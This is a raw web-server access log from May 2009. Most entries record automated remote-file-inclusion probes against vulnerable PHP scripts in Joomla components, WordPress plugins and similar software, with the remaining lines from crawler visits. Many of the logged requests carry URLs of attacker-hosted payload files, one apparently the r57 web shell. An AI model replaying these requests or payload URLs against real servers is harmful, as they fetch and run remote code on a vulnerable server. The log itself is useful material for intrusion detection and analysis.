94.76.213.218 - - [17/May/2009:05:06:05 -0500] "GET /logs/access_log.1229472000 HTTP/1.1" 200 14129 "http://fortpit.pconline.com/logs/access_log.1229472000""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; iOpus-I-M; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
94.198.214.29 - - [17/May/2009:05:09:23 -0500] "GET /logs/index.php?target=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
94.198.214.29 - - [17/May/2009:05:09:23 -0500] "GET /index.php?target=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
94.198.214.29 - - [17/May/2009:05:09:37 -0500] "GET /logs/index.php?target=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
94.198.214.29 - - [17/May/2009:05:09:38 -0500] "GET /index.php?target=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
65.55.106.204 - - [17/May/2009:05:11:58 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.204 - - [17/May/2009:05:12:59 -0500] "GET /logs/access_log.1133395200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.147.29.190 - - [17/May/2009:05:15:32 -0500] "GET /logs/index.php?target=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.808"
217.147.29.190 - - [17/May/2009:05:15:32 -0500] "GET /index.php?target=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.808"
121.173.130.41 - - [17/May/2009:05:16:53 -0500] "GET //citywriter/head.php?path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
121.173.130.41 - - [17/May/2009:05:16:54 -0500] "GET /logs//citywriter/head.php?path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
121.173.130.41 - - [17/May/2009:05:16:55 -0500] "GET /logs/access_log.1237939200//citywriter/head.php?path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
121.173.130.41 - - [17/May/2009:05:17:44 -0500] "GET /logs/access_log.1240444800//citywriter/head.php?path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
121.173.130.41 - - [17/May/2009:05:17:53 -0500] "GET /logs/access_log.1240531200//citywriter/head.php?path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
81.176.226.164 - - [17/May/2009:05:17:56 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
81.176.226.164 - - [17/May/2009:05:17:56 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
81.176.226.164 - - [17/May/2009:05:17:56 -0500] "GET /logs/access_log.1237766400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
81.176.226.164 - - [17/May/2009:05:17:56 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
65.55.106.108 - - [17/May/2009:05:19:02 -0500] "GET /logs/access_log.1129593600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.147.29.190 - - [17/May/2009:05:19:11 -0500] "GET /logs/index.php?target=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.808"
217.147.29.190 - - [17/May/2009:05:19:11 -0500] "GET /index.php?target=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.808"
217.147.29.190 - - [17/May/2009:05:19:42 -0500] "GET /logs//bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.808"
217.147.29.190 - - [17/May/2009:05:19:42 -0500] "GET //bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.808"
217.147.29.190 - - [17/May/2009:05:19:54 -0500] "GET /logs//bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.808"
217.147.29.190 - - [17/May/2009:05:19:55 -0500] "GET //bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.808"
65.55.208.144 - - [17/May/2009:05:21:46 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.144 - - [17/May/2009:05:21:48 -0500] "GET /logs/access_log.1237939200 HTTP/1.1" 200 335496 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
209.200.8.89 - - [17/May/2009:05:23:24 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
209.200.8.89 - - [17/May/2009:05:23:25 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
123.143.98.5 - - [17/May/2009:05:27:06 -0500] "GET //?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
123.143.98.5 - - [17/May/2009:05:27:06 -0500] "GET /logs/access_log.1232150400//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
123.143.98.5 - - [17/May/2009:05:27:08 -0500] "GET /logs//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 189703 "-""Mozilla/5.0"
123.143.98.5 - - [17/May/2009:05:27:11 -0500] "GET /logs/access_log.1236902400//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
209.200.8.89 - - [17/May/2009:05:28:47 -0500] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
209.200.8.89 - - [17/May/2009:05:28:47 -0500] "GET /logs/access_log.1239926400//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.200.8.89 - - [17/May/2009:05:28:48 -0500] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
123.143.98.5 - - [17/May/2009:05:30:32 -0500] "GET /logs/access_log.1236902400//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
123.143.98.5 - - [17/May/2009:05:30:32 -0500] "GET /logs/access_log.1232150400//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
123.143.98.5 - - [17/May/2009:05:30:32 -0500] "GET //?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
123.143.98.5 - - [17/May/2009:05:30:33 -0500] "GET /logs//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 189703 "-""Mozilla/5.0"
195.2.228.113 - - [17/May/2009:05:34:30 -0500] "GET //joomla/index.php?option=com_restaurante&task=http://www.top-master.nsk.ru/awstats/cgi-bin/lang/tooltips_w/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
195.2.228.113 - - [17/May/2009:05:34:30 -0500] "GET /logs/access_log.1239494400//joomla/index.php?option=com_restaurante&task=http://www.top-master.nsk.ru/awstats/cgi-bin/lang/tooltips_w/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
195.2.228.113 - - [17/May/2009:05:34:30 -0500] "GET /logs/access_log.1238976000//joomla/index.php?option=com_restaurante&task=http://www.top-master.nsk.ru/awstats/cgi-bin/lang/tooltips_w/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
195.2.228.113 - - [17/May/2009:05:34:30 -0500] "GET /logs//joomla/index.php?option=com_restaurante&task=http://www.top-master.nsk.ru/awstats/cgi-bin/lang/tooltips_w/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
81.175.71.121 - - [17/May/2009:05:34:56 -0500] "GET /logs/access_log.1239062400///?_SERVER[DOCUMENT_ROOT]=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
81.175.71.121 - - [17/May/2009:05:34:56 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
81.175.71.121 - - [17/May/2009:05:34:57 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 200 189704 "-""Mozilla/5.0"
195.2.228.113 - - [17/May/2009:05:35:01 -0500] "GET /logs/access_log.1239667200//joomla/index.php?option=com_restaurante&task=http://www.top-master.nsk.ru/awstats/cgi-bin/lang/tooltips_w/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
201.234.41.5 - - [17/May/2009:05:37:06 -0500] "GET //joomla/index.php?option=com_restaurante&task=http://www.top-master.nsk.ru/awstats/cgi-bin/lang/tooltips_w/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
201.234.41.5 - - [17/May/2009:05:37:06 -0500] "GET /logs/access_log.1239494400//joomla/index.php?option=com_restaurante&task=http://www.top-master.nsk.ru/awstats/cgi-bin/lang/tooltips_w/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
201.234.41.5 - - [17/May/2009:05:37:06 -0500] "GET /logs//joomla/index.php?option=com_restaurante&task=http://www.top-master.nsk.ru/awstats/cgi-bin/lang/tooltips_w/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
201.234.41.5 - - [17/May/2009:05:37:06 -0500] "GET /logs/access_log.1238976000//joomla/index.php?option=com_restaurante&task=http://www.top-master.nsk.ru/awstats/cgi-bin/lang/tooltips_w/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
81.175.71.121 - - [17/May/2009:05:37:09 -0500] "GET /logs/components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://www.ladyboss.com.ua/readme.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.803"
81.175.71.121 - - [17/May/2009:05:37:09 -0500] "GET /components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://www.ladyboss.com.ua/readme.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
201.234.41.5 - - [17/May/2009:05:37:25 -0500] "GET /logs/access_log.1239667200//joomla/index.php?option=com_restaurante&task=http://www.top-master.nsk.ru/awstats/cgi-bin/lang/tooltips_w/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
81.175.71.121 - - [17/May/2009:05:40:52 -0500] "GET /logs/components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://www.ladyboss.com.ua/readme.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.803"
81.175.71.121 - - [17/May/2009:05:40:52 -0500] "GET /components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://www.ladyboss.com.ua/readme.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
195.2.228.113 - - [17/May/2009:05:41:49 -0500] "GET /logs/access_log.1239235200//joomla/index.php?option=com_restaurante&task=http://www.top-master.nsk.ru/awstats/cgi-bin/lang/tooltips_w/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
201.234.41.5 - - [17/May/2009:05:43:02 -0500] "GET /logs/access_log.1239235200//joomla/index.php?option=com_restaurante&task=http://www.top-master.nsk.ru/awstats/cgi-bin/lang/tooltips_w/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
121.173.130.41 - - [17/May/2009:05:45:10 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
121.173.130.41 - - [17/May/2009:05:45:10 -0500] "GET /logs/access_log.1236816000//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
121.173.130.41 - - [17/May/2009:05:45:10 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
121.173.130.41 - - [17/May/2009:05:45:13 -0500] "GET /logs/access_log.1236902400//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.129.119.16 - - [17/May/2009:05:48:12 -0500] "GET /robots.txt HTTP/1.0" 404 281 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
218.146.231.207 - - [17/May/2009:05:51:17 -0500] "GET /logs/access_log.1235001600/includes/ktedit/toolbar.php?dirDepth=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
65.55.106.227 - - [17/May/2009:05:51:37 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.3.226.56 - - [17/May/2009:05:51:49 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
72.3.226.56 - - [17/May/2009:05:51:49 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
65.55.106.227 - - [17/May/2009:05:52:29 -0500] "GET /logs/access_log.1128297600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.198.214.29 - - [17/May/2009:05:53:03 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
94.198.214.29 - - [17/May/2009:05:53:03 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
124.0.55.34 - - [17/May/2009:05:53:49 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
124.0.55.34 - - [17/May/2009:05:53:49 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
124.0.55.34 - - [17/May/2009:05:53:49 -0500] "GET /logs/access_log.1235174400//components/com_simpleboard/image_upload.php?sbp=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
124.0.55.34 - - [17/May/2009:05:54:47 -0500] "GET /logs/access_log.1237852800//components/com_simpleboard/image_upload.php?sbp=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
195.5.168.93 - - [17/May/2009:05:56:47 -0500] "GET //employers/employer_registration.php//?_SERVER[DOCUMENT_ROOT]=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
195.5.168.93 - - [17/May/2009:05:56:47 -0500] "GET /logs//employers/employer_registration.php//?_SERVER[DOCUMENT_ROOT]=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
209.90.91.245 - - [17/May/2009:05:56:52 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 353 "-""libwww-perl/5.822"
209.90.91.245 - - [17/May/2009:05:56:52 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.822"
195.5.168.93 - - [17/May/2009:05:56:53 -0500] "GET /logs/access_log.1231286400//employers/employer_registration.php//?_SERVER[DOCUMENT_ROOT]=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
94.198.214.29 - - [17/May/2009:05:57:21 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
94.198.214.29 - - [17/May/2009:05:57:22 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
66.219.97.207 - - [17/May/2009:05:58:47 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 353 "-""libwww-perl/5.79"
66.219.97.207 - - [17/May/2009:05:58:47 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
217.147.29.190 - - [17/May/2009:05:59:18 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.808"
217.147.29.190 - - [17/May/2009:05:59:18 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.808"
217.147.29.190 - - [17/May/2009:05:59:34 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.808"
217.147.29.190 - - [17/May/2009:05:59:34 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.808"
94.198.214.29 - - [17/May/2009:05:59:39 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
94.198.214.29 - - [17/May/2009:05:59:40 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
195.5.168.93 - - [17/May/2009:05:59:40 -0500] "GET /logs//forum/?sourcedir=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0"
195.5.168.93 - - [17/May/2009:05:59:41 -0500] "GET /logs/access_log.1231286400//forum/?sourcedir=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
195.5.168.93 - - [17/May/2009:05:59:47 -0500] "GET //forum/?sourcedir=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 290 "-""Mozilla/5.0"
64.118.90.253 - - [17/May/2009:05:59:58 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 353 "-""libwww-perl/5.823"
64.118.90.253 - - [17/May/2009:05:59:58 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.823"
70.86.169.162 - - [17/May/2009:06:06:13 -0500] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
70.86.169.162 - - [17/May/2009:06:06:13 -0500] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
217.147.29.190 - - [17/May/2009:06:11:10 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.808"
217.147.29.190 - - [17/May/2009:06:11:10 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.808"
217.147.29.190 - - [17/May/2009:06:11:32 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.808"
217.147.29.190 - - [17/May/2009:06:11:33 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.808"
118.45.190.166 - - [17/May/2009:06:14:35 -0500] "GET /logs/access_log.1237161600/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
118.45.190.166 - - [17/May/2009:06:14:35 -0500] "GET /logs/access_log.1230768000/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
118.45.190.166 - - [17/May/2009:06:14:35 -0500] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
118.45.190.166 - - [17/May/2009:06:14:35 -0500] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.55.106.147 - - [17/May/2009:06:15:08 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.147 - - [17/May/2009:06:15:59 -0500] "GET /logs/access_log.1126310400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
79.45.98.65 - - [17/May/2009:06:21:32 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sklepikok.pl/robie/figa/r57.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.826"
79.45.98.65 - - [17/May/2009:06:21:32 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sklepikok.pl/robie/figa/r57.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.826"
222.231.24.38 - - [17/May/2009:06:21:58 -0500] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:06:21:58 -0500] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:06:21:58 -0500] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:06:21:58 -0500] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
209.90.91.245 - - [17/May/2009:06:26:30 -0500] "GET /logs/ray/modules/global/inc/header.inc.php?sIncPath=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.822"
209.90.91.245 - - [17/May/2009:06:26:30 -0500] "GET /ray/modules/global/inc/header.inc.php?sIncPath=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.822"
85.214.86.93 - - [17/May/2009:06:27:07 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
85.214.86.93 - - [17/May/2009:06:27:07 -0500] "GET /logs/access_log.1236124800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 369 "-""Mozilla/5.0"
85.214.86.93 - - [17/May/2009:06:27:08 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
85.214.86.93 - - [17/May/2009:06:27:08 -0500] "GET /logs/access_log.1238544000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 369 "-""Mozilla/5.0"
64.118.90.253 - - [17/May/2009:06:27:27 -0500] "GET /logs/ray/modules/global/inc/header.inc.php?sIncPath=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.823"
64.118.90.253 - - [17/May/2009:06:27:27 -0500] "GET /ray/modules/global/inc/header.inc.php?sIncPath=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.823"
64.118.90.253 - - [17/May/2009:06:29:14 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.823"
64.118.90.253 - - [17/May/2009:06:29:15 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.823"
77.221.130.19 - - [17/May/2009:06:31:07 -0500] "GET /logs/environment.php?DIR_PREFIX=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
77.221.130.19 - - [17/May/2009:06:31:07 -0500] "GET /environment.php?DIR_PREFIX=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
